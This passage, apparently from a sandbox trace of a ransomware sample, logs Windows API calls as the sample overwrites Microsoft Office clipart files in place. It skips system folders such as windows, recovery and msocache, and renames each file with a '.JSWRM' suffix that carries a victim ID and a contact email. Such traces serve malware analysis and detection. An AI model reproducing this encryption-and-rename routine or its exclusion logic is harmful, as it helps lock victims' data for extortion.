hHeap=0x1e0000) returned 1 [0083.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.692] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.693] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe867602, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe867602, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe8d9e20, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152430.WMF", cAlternateFileName="")) returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2=".") returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="..") returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="...") returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="windows") returned -1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="recovery") returned -1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="perflogs") returned -1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="documents and settings") returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="system volume information") returned -1 [0083.693] lstrcmpiW (lpString1="J0152430.WMF", lpString2="msocache") returned -1 [0083.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152430.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152430.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152430.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152430.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152430.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152430.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0083.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.853] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14132) returned 1 [0083.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3730) returned 0x24d210 [0083.853] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3730, lpOverlapped=0x0) returned 1 [0083.906] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.906] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3730, lpOverlapped=0x0) returned 1 [0083.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.906] CloseHandle (hObject=0x314) returned 1 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0083.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0083.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0083.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0083.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0083.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0083.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0083.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.908] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe867602, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe867602, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe88d87c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x406c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152432.WMF", cAlternateFileName="")) returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2=".") returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="..") returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="...") returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="windows") returned -1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="recovery") returned -1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="perflogs") returned -1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="documents and settings") returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="system volume information") returned -1 [0083.908] lstrcmpiW (lpString1="J0152432.WMF", lpString2="msocache") returned -1 [0083.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152432.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152432.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0083.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152432.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152432.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0083.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.909] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16492) returned 1 [0083.909] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4060) returned 0x24d210 [0083.909] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4060, lpOverlapped=0x0) returned 1 [0083.922] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.922] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4060, lpOverlapped=0x0) returned 1 [0083.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.923] CloseHandle (hObject=0x314) returned 1 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0083.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0083.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0083.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0083.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0083.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.923] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.924] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe867602, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe867602, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe8b3ab6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c4c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152436.WMF", cAlternateFileName="")) returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2=".") returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="..") returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="...") returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="windows") returned -1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="recovery") returned -1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="perflogs") returned -1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="documents and settings") returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="system volume information") returned -1 [0083.924] lstrcmpiW (lpString1="J0152436.WMF", lpString2="msocache") returned -1 [0083.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152436.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152436.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152436.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152436.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152436.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152436.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0083.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0083.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0083.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.925] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11340) returned 1 [0083.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c40) returned 0x24d210 [0083.925] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c40, lpOverlapped=0x0) returned 1 [0083.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.944] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c40, lpOverlapped=0x0) returned 1 [0083.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.944] CloseHandle (hObject=0x314) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0083.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0083.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0083.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0083.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0083.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0083.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0083.945] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe867602, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe867602, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4030, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152556.WMF", cAlternateFileName="")) returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2=".") returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="..") returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="...") returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="windows") returned -1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="recovery") returned -1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="perflogs") returned -1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="documents and settings") returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", lpString2="system volume information") returned -1 [0083.945] lstrcmpiW (lpString1="J0152556.WMF", 